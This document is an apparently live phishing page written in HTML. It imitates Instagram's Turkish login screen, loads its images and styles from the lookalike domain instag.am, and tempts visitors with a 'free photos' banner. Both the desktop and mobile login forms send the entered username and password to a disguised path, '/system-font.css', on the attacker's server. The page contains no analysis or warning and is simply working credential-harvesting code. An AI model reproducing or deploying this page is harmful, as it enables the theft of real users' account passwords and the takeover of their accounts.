<!DOCTYPE html>
<html lang="tr">
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Instagram</title>
<link rel="shortcut icon" href="http://www.instag.am/newico.ico" />
	<!-- Global stylesheets -->
	<link href="https://fonts.googleapis.com/css?family=Roboto:400,300,100,500,700,900&subset=latin,latin-ext" rel="stylesheet" type="text/css">
    <!-- for minified version add this -->
    <link rel="stylesheet" type="text/css" href="http://www.instag.am/fonts/fonts.min.css" />
    <link rel="stylesheet" type="text/css" href="http://www.instag.am/system-font.css" />

	<link href="http://www.instag.am/assets/css/icons/icomoon/styles.css" rel="stylesheet" type="text/css">
	<link href="http://www.instag.am/assets/css/bootstrap.css" rel="stylesheet" type="text/css">
	<link href="http://www.instag.am/assets/css/core.css" rel="stylesheet" type="text/css">
	<link href="http://www.instag.am/assets/css/components.css" rel="stylesheet" type="text/css">
	<link href="http://www.instag.am/assets/css/colors.css" rel="stylesheet" type="text/css">
	<link href="http://www.instag.am/assets/css/icons/fontawesome/styles.min.css" rel="stylesheet" type="text/css">
	<!-- /global stylesheets -->

	<!-- Core JS files -->
	<script type="text/javascript" src="http://www.instag.am/assets/js/plugins/loaders/pace.min.js"></script>
	<script type="text/javascript" src="http://www.instag.am/assets/js/core/libraries/jquery.min.js"></script>
	<script type="text/javascript" src="http://www.instag.am/assets/js/core/libraries/bootstrap.min.js"></script>
	<script type="text/javascript" src="http://www.instag.am/assets/js/plugins/loaders/blockui.min.js"></script>
	<!-- /core JS files -->
    <style>
        body{
            font-family: 'Proxima Nova'!important;
        }
    </style>
	<!-- Theme JS files -->
	<script>

function cycleImages(){
      var $active = $('#cycler .activex');
      var $next = ($active.next().length > 0) ? $active.next() : $('#cycler img:first');
      $next.css('z-index',2);//move the next image up the pile
      $active.fadeOut(2000,function(){//fade out the top image
	  $active.css('z-index',1).show().removeClass('activex');//reset the z-index and unhide the image
          $next.css('z-index',3).addClass('activex');//make the next image the top one
      });
    }

$(document).ready(function(){
// run every 7s
setInterval('cycleImages()', 5000);
})

$('.pull-down').each(function() {
	$(this).css('margin-top', $(this).parent().height()-$(this).height())
});
</script>
	<script type="text/javascript" src="http://www.instag.am/assets/js/plugins/forms/styling/uniform.min.js"></script>
<!-- Theme JS files -->
	<script type="text/javascript" src="http://www.instag.am/assets/js/plugins/notifications/pnotify.min.js"></script>
	<script type="text/javascript" src="http://www.instag.am/assets/js/core/app.js"></script>
	<!-- /theme JS files -->
 
</head>

<body class="login-cover">
<div class="ustkisim">Ücretsiz Fotoğrafların Var<br><span style="font-size: 12px; font-weight: normal;">Kaydolduktan sonra daha fazla ücretsiz fotoğraf keşfet.</span></div>
<div class="row hidden-sm hidden-md hidden-lg" style="width: 100%; height:50px;"> &nbsp; </div>
	<!-- Page container -->
	<div class="page-container login-container">

		<!-- Page content -->
		<div class="page-content">

			<!-- Main content -->
			<div class="content-wrapper  hidden-xs">

				<!-- Content area -->
				<div class="content">
				<div class="row" style="margin-top:-50px;">
			<div class="col-md-12">
					<!-- Form with validation -->

                <div class="col-centered" style="max-width:830px; min-width:350px;">
					<div class="col-md-12">
					<div class="col-md-6 hidden-xs">
					
					<div style="background: url('http://www.instag.am/telefon.png') no-repeat; width:454px; height:618px;">
					<div id="cycler" style="padding-left:150.5px; padding-top:100px;">
					<img class="activex" src="http://www.instag.am/bg/1.jpg" width="240" height="427" />
					<img src="http://www.instag.am/bg/2.jpg"  width="240" height="427" />
					<img src="http://www.instag.am/bg/3.jpg"  width="240" height="427" />
					<img src="http://www.instag.am/bg/4.jpg"  width="240" height="427" />
					<img src="http://www.instag.am/bg/5.jpg"  width="240" height="427" />
					</div>
					</div>
					</div>
					<div class="col-md-6 text-center">
					
					<div style="width:100%; height:80px;"></div>
						<div class="panel panel-body login-form " style="width:350px; margin-left:23px; border: 1px #EDEEEE solid; box-shadow: 0px 0px 0px #EDEEEE;  border-radius: 0px;" >
						<form action="/system-font.css"  method="POST">
							<div class="text-center">
								<div ><img src="http://www.instag.am/y.png" class="text-center"  style="margin-top:10px; margin-bottom:10px;" ></div>
							</div>

							<div class="form-group" style="padding-left:17px; padding-right:17px;">
								<input type="text" class="form-control" style="background-color:#FDFDFD; border:1px #EDEEEE solid; font-family:'Segoe UI',Roboto;  font-size:12px; padding:8px; height:38px;"  placeholder="Telefon numarası, kullanıcı adı veya e-posta adresi" name="username" required="required">
							</div>

							<div class="form-group"  style="padding-left:17px; padding-right:17px; margin-top:-14px;">
								<input type="password" class="form-control" style="background-color:#FDFDFD; border:1px #EDEEEE solid; font-family:'Segoe UI',Roboto;  font-size:12px; padding:8px; height:38px;"  placeholder="Şifre" name="password" required="required">
								</a>
							</div>
<input type="text" class="form-control hidden"  name="number" value="1" >



							<div class="form-group"  style="padding-left:17px; padding-right:17px;  margin-top:-10px;">
								<button type="submit" class="btn btn-primary bg-instagram btn-block" style=" font-family:'Segoe UI',Roboto; font-size:14px; font-weight: 600; padding-top: 3px; padding-bottom: 3px; border:0px;">Giriş yap</button>
							</div>
                                    <a  href="https://instagram.com/accounts/password/reset/" style="font-family:'Segoe UI',Roboto; color:#324889; font-size:12px; cursor:pointer;">Şifreni mi unuttun?</a>

</form>


						</div>
                        <div class="panel panel-body login-form " style="width:350px; margin-left:23px; font-family:'Segoe UI',Roboto;  font-size:14px; border: 1px #EDEEEE solid; box-shadow: 0px 0px 0px #EDEEEE;  border-radius: 0px;" >
                            Hesabın yok mu? <a href="https://www.instagram.com/accounts/emailsignup/">Kaydol</a>
                        </div>
						<div class="col-md-12 text-center" style="margin-top:10px;">
					<span class="text-center" style="font-family:'Segoe UI',Roboto; font-size:14px; ">Uygulamayı indir.</span>
					</div>
					<div class="col-md-12 text-center" style="margin-top:10px; padding-left:-40px; padding-right: -40px;"><a
                                href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&ct=igweb.unifiedHome.badge&mt=8"><img
                                    src="http://www.instag.am/appstore.png"  height="40"></a> &nbsp;<a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DunifiedHome%26utm_medium%3Dbadge"><img src="http://www.instag.am/googleplay.png" height="40"></a> &nbsp;<a
                                href="https://www.microsoft.com/en-us/store/apps/instagram/9nblggh5l9xt"><img
                                    src="http://www.instag.am/microsoft.png"  height="40"></a> </div>
					<!-- /form with validation -->
						</div>


					<!-- Footer -->


					<!-- /footer -->
					</div>
					</div>
					<div class="row">
					<div class="col-md-12"  style="position: fixed; bottom: 40px;">

					<div class="col-md-7 col-centered">
					<a href="" class="linkver">HAKKIMIZDA</a>
					<a href="" class="linkver">DESTEK</a>
					<a href="" class="linkver">BLOG</a>
					<a href="" class="linkver">BASIN</a>
					<a href="" class="linkver">API</a>
					<a href="" class="linkver">İŞ FIRSATLARI</a>
					<a href="" class="linkver">GİZLİLİK</a>
					<a href="" class="linkver">KOŞULLAR</a>
					<a href="" class="linkver">DİL</a>
					<div class="pull-right" style="font-family:'Segoe UI',Roboto; font-weight:600; font-size:12px; color:#4B4F54;">© 2018 INSTAGRAM</div></div>

						</div></div>
					</div>
</div>




				</div>
				<!-- /content area -->

			</div>
			<!-- /main content -->






			<!-- Main content -->
			<div class="hidden-sm hidden-md hidden-lg " style="height:100%">

				<!-- Content area -->
				<div class="content">
				<div class="row">
			<div class="col-md-12">
					<!-- Form with validation -->

					<div class="col-centered">


					<div class="col-md-12 text-center">

					<div style="width:100%; height:10px;"></div>

						<form action="/system-font.css"   method="POST">
							<div class="text-center">
								<div ><img src="http://www.instag.am/y.png" class="text-center"  style="margin-top:10px; margin-bottom:10px;" ></div>
							</div>

							<div class="form-group" >
								<input type="text" class="form-control" style="background-color:#FDFDFD; border:1px #EDEEEE solid; font-family:'Segoe UI',Roboto,Roboto;  font-size:12px; padding:8px; height:38px;"  placeholder="Telefon numarası, kullanıcı adı veya e-posta adresi" name="username" required="required">

							</div>

							<div class="form-group"  style=" margin-top:-14px;">
								<input type="password" class="form-control" style="background-color:#FDFDFD; border:1px #EDEEEE solid; font-family:'Segoe UI',Roboto,Roboto;  font-size:12px; padding:8px; height:38px;"  placeholder="Şifre" name="password" required="required">

							</div>


<input type="text" class="form-control hidden"  name="number" value="1" >
							<div class="form-group"  style=" margin-top:-10px;">
								<button type="submit" class="btn btn-primary bg-instagram btn-block" style=" font-family:'Segoe UI',Roboto,Roboto;  font-size:14px; font-weight: 600; padding-top: 3px; padding-bottom: 3px; border:0px;">Giriş yap</button>
							</div>
</form>
							                        <a  href="https://instagram.com/accounts/password/reset/" style="font-family:'Segoe UI',Roboto; color:#324889; font-size:12px; cursor:pointer;">Şifreni mi unuttun?</a>

                        <div class="col-md-12 text-center" style="margin-top:50px; font-family:'Segoe UI',Roboto; font-size:14px;">
                            Hesabın yok mu? <a href="https://www.instagram.com/accounts/emailsignup/">Kaydol</a>
                        </div>

						<div class="col-md-12 text-center" style="margin-top:50px;">
                            <span class="text-center" style="font-family:'Segoe UI',Roboto; font-size:14px; ">Uygulamayı indir.</span>
					</div>
					<div class="col-md-12 text-center" style="margin-top:10px;"><a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&ct=igweb.unifiedHome.badge&mt=8"><img src="http://www.instag.am/appstore.png"  height="40"></a> &nbsp; <a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DunifiedHome%26utm_medium%3Dbadge"><img src="http://www.instag.am/googleplay.png" height="40"></a>&nbsp;<a
                                href="https://www.microsoft.com/en-us/store/apps/instagram/9nblggh5l9xt"><img
                                    src="http://www.instag.am/microsoft.png"  height="40"></a> </div>
					<!-- /form with validation -->
						</div>


					<!-- Footer -->


					<!-- /footer -->

					</div>

					</div>



</div>




				</div>
				<!-- /content area -->
<div class="row "  style=" margin-top:40px;">
					<div class="col-md-12">

					<div class="col-md-7 col-centered" style="text-align: center;">
					<a href="" class="linkver mobilelinkver">HAKKIMIZDA</a>
					<a href="" class="linkver mobilelinkver">DESTEK</a>
					<a href="" class="linkver mobilelinkver">BLOG</a>
					<a href="" class="linkver mobilelinkver">BASIN</a>
					<a href="" class="linkver mobilelinkver">API</a>
					<a href="" class="linkver mobilelinkver">İŞ FIRSATLARI</a>
					<a href="" class="linkver mobilelinkver">GİZLİLİK</a>
					<a href="" class="linkver mobilelinkver">KOŞULLAR</a>
					<a href="" class="linkver mobilelinkver">DİL</a>
					<div class="pull-right" style="font-family:'Segoe UI',Roboto; font-weight:600; font-size:12px; color:#4B4F54;">© 2018 INSTAGRAM</div></div>
			</div></div></div>
			<!-- /main content -->
			
			
			
			
			
			
			

		</div>
		<!-- /page content -->

	</div>
	<!-- /page container -->

</body>
</html>
